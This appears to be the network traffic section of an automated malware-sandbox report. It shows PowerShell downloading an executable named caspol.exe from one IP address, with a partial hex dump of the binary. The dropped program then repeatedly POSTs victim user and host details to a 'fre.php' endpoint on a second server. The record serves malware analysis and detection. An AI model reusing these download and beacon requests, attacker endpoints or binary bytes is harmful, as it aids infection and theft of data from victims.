                                                                    Nov 20, 2024 07:56:35.880099058 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                    Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:35.880111933 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                    Nov 20, 2024 07:56:35.880125999 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                    Nov 20, 2024 07:56:35.880141020 CET1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                    Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                    Nov 20, 2024 07:56:35.880153894 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                    Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:35.885080099 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.2249167192.3.243.136803580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:56:44.852971077 CET333OUTGET /55/caspol.exe HTTP/1.1
                                                                    Accept: */*
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 192.3.243.136
                                                                    Connection: Keep-Alive
                                                                    Nov 20, 2024 07:56:45.447622061 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 20 Nov 2024 06:56:45 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Wed, 20 Nov 2024 01:04:28 GMT
                                                                    ETag: "92a00-6274dbb521496"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 600576
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdownload
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 35 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 2e 27 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5=g0 .' @@ `&O@|` H.text4 `.rsrc|@@@.reloc`(@B'H6(^((}{rp o5{o7&*0{o9}&*0to{{rp(o:+%{oo;o&Xi2{o<&{o=*+E\b2{oA*n(}}(*0
                                                                    Nov 20, 2024 07:56:45.447639942 CET1236INData Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00
                                                                    Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.0#{
                                                                    Nov 20, 2024 07:56:45.447664976 CET1236INData Raw: 00 00 0a 02 7b 0b 00 00 04 1e 1d 1e 1d 73 32 00 00 0a 6f 33 00 00 0a 02 7b 0b 00 00 04 72 b9 01 00 70 6f 34 00 00 0a 02 7b 0b 00 00 04 20 c8 00 00 00 1f 37 73 35 00 00 0a 6f 36 00 00 0a 02 7b 0b 00 00 04 1b 6f 37 00 00 0a 02 7b 0b 00 00 04 72 d3
                                                                    Data Ascii: {s2o3{rpo4{ 7s5o6{o7{rpo8{o<{s:o="A"As>(?(@ ] s5(A(B{oC(B{oC(B{oC(B{oC
                                                                    Nov 20, 2024 07:56:45.447680950 CET1236INData Raw: 00 1f 20 73 35 00 00 0a 6f 36 00 00 0a 02 7b 11 00 00 04 1b 6f 37 00 00 0a 02 7b 11 00 00 04 72 53 03 00 70 6f 38 00 00 0a 20 2b 23 00 00 28 4f 00 00 0a 06 72 65 03 00 70 6f 44 00 00 0a 75 03 00 00 1b 0b 28 50 00 00 0a 72 6f 03 00 70 6f 51 00 00
                                                                    Data Ascii: s5o6{o7{rSpo8 +#(OrepoDu(PropoQiI((8a_X ]X __`aX _EE(X _{a
                                                                    Nov 20, 2024 07:56:45.447695971 CET1236INData Raw: 16 00 00 04 2d 1e 72 27 04 00 70 d0 06 00 00 02 28 29 00 00 0a 6f 62 00 00 0a 73 63 00 00 0a 80 16 00 00 04 7e 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 6a 28 18 00 00 06 72 67 04 00 70 7e 17 00 00 04 6f 64 00 00 0a 74 26 00 00
                                                                    Data Ascii: -r'p()obsc~*~**j(rgp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*~*(e*Vs!(ft*0{
                                                                    Nov 20, 2024 07:56:45.447706938 CET1236INData Raw: a7 05 00 70 a2 25 17 72 af 05 00 70 a2 28 31 00 00 06 2d 07 06 73 42 00 00 06 7a 06 2a 4a 02 72 b7 05 00 70 28 33 00 00 06 02 28 34 00 00 06 2a be 02 72 c1 05 00 70 28 33 00 00 06 02 02 28 34 00 00 06 17 8d 31 00 00 01 25 16 72 a7 05 00 70 a2 28
                                                                    Data Ascii: p%rp(1-sBz*Jrp(3(4*rp(3(41%rp(1,}*0Crpsvowox,(oy+(z,*Xi2*0(4(1-sBz*0Z{,Frp
                                                                    Nov 20, 2024 07:56:45.447724104 CET1236INData Raw: 0c 41 00 01 00 01 00 01 00 10 00 cc 01 96 0c 49 00 03 00 05 00 01 00 10 00 9d 08 96 0c 49 00 0c 00 0d 00 80 01 10 00 0d 07 96 0c 41 00 16 00 16 00 00 00 10 00 3e 0a bf 0a 41 00 16 00 17 00 00 01 10 00 0f 0b bf 0a a5 00 18 00 20 00 01 00 10 00 8c
                                                                    Data Ascii: AIIA>A iA#i5iyBL=PS3W[s_c}_cg$gS1PP[__4cocg
                                                                    Nov 20, 2024 07:56:45.447734118 CET1236INData Raw: 00 00 00 01 00 92 08 00 00 01 00 3e 02 00 00 02 00 78 01 00 00 01 00 bf 0b 00 00 02 00 d8 01 00 00 03 00 7f 0c 00 00 01 00 c1 0c 00 00 02 00 34 07 00 00 01 00 e0 08 00 00 02 00 54 05 00 00 01 00 e0 08 00 00 02 00 54 05 00 00 01 00 e0 08 00 00 02
                                                                    Data Ascii: >x4TTTTTT49O>x*5s
                                                                    Nov 20, 2024 07:56:45.447747946 CET1236INData Raw: 00 63 00 95 03 2e 00 6b 00 bf 03 2e 00 73 00 cc 03 49 00 9b 00 5e 03 c3 00 83 00 1b 04 c3 00 8b 00 16 04 c3 00 93 00 16 04 e3 00 93 00 16 04 e3 00 83 00 5d 04 c0 02 7b 00 16 04 27 00 2b 00 49 00 8d 00 0a 01 0f 01 15 01 1b 01 1f 01 b3 01 ce 01 df
                                                                    Data Ascii: c.k.sI^]{'+I~%g+u++++j1 3k:K8
                                                                    Nov 20, 2024 07:56:45.447758913 CET1236INData Raw: 74 65 00 44 65 62 75 67 67 65 72 4e 6f 6e 55 73 65 72 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69
                                                                    Data Ascii: teDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDes
                                                                    Nov 20, 2024 07:56:45.452725887 CET1236INData Raw: 00 52 63 70 74 54 6f 00 4d 65 74 68 6f 64 49 6e 66 6f 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 42 69 74 6d 61 70 00 53 77 61 70 00 53 6c 65 65 70 00 68 65 6c 70 00 67 65 74 5f 4a 56 6d 70 00 4e 6f 6f 70 00 73 65 74 5f 54 61 62 53 74 6f 70 00 49 53
                                                                    Data Ascii: RcptToMethodInfoCultureInfoBitmapSwapSleephelpget_JVmpNoopset_TabStopISmtp_smtpGroupStartupClearset_UseSystemPasswordCharInvokeMemberStringBuildersenderBinderget_ResourceManagerComponentResourceManagerFormClosedEventHand


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.224916894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:56:57.243405104 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 176
                                                                    Connection: close
                                                                    Nov 20, 2024 07:56:57.248279095 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: 'ckav.ruAlbus849224ALBUS-PCk0DE4229FCF97F5879F50F8FD3qzHtQ
                                                                    Nov 20, 2024 07:56:57.988333941 CET185INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:56:57 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.224916994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:56:59.157105923 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 176
                                                                    Connection: close
                                                                    Nov 20, 2024 07:56:59.162066936 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: 'ckav.ruAlbus849224ALBUS-PC+0DE4229FCF97F5879F50F8FD3iHQqP
                                                                    Nov 20, 2024 07:56:59.882088900 CET185INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:56:59 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.224917094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:00.033211946 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:00.038068056 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:00.796703100 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.224917194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:00.981055975 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:00.985980988 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:01.712006092 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:01 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.224917294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:01.985131025 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:01.990103006 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:02.731832027 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:02 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.224917394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:03.023063898 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:03.028263092 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:03.741231918 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.224917494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:04.453051090 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:04.458084106 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:05.310630083 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.224917694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:05.508730888 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:05.513581038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:06.374385118 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.224917794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:07.048321962 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:07.053236961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:07.917478085 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:07 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.224917894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:08.395258904 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:08.400151968 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:09.108309984 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.224918294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:09.283468008 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:09.288352966 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:10.035382032 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
